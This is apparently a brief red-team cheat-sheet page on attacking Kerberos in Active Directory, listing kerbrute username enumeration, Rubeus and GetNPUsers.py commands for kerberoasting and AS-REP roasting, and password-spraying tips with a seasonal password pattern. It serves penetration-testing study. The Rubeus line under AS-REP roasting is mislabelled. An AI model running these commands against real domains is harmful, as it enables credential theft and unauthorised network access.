Kerberos

Methods of attacking kerberos.

Unauthenticated Attacks

User Enumeration

Command

Description

./kerbrute userenum -d <fqdn> --dc <dc_ip> userlist.txt

Enumerate Valid Usernames. Enumerating valid usernames greatly increases the likelihood of successful password attacks.

ASREPRoast

Command

Description

Rubeus.exe Kerberoast

This can be done two ways.

Rubeus

Rubeus.exe kerberoast

GetNPUsers.py

Check ASREPRoast with list of users enumerated (no credentials required) python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

Password Attack

With the list of usernames recovered, select one or two password to spray. Start with something like <season|month>2021!

Kerberoast

PreviousCredential Abuse NextDetecting Red Team Activity

Last updated 3 years ago

Was this helpful?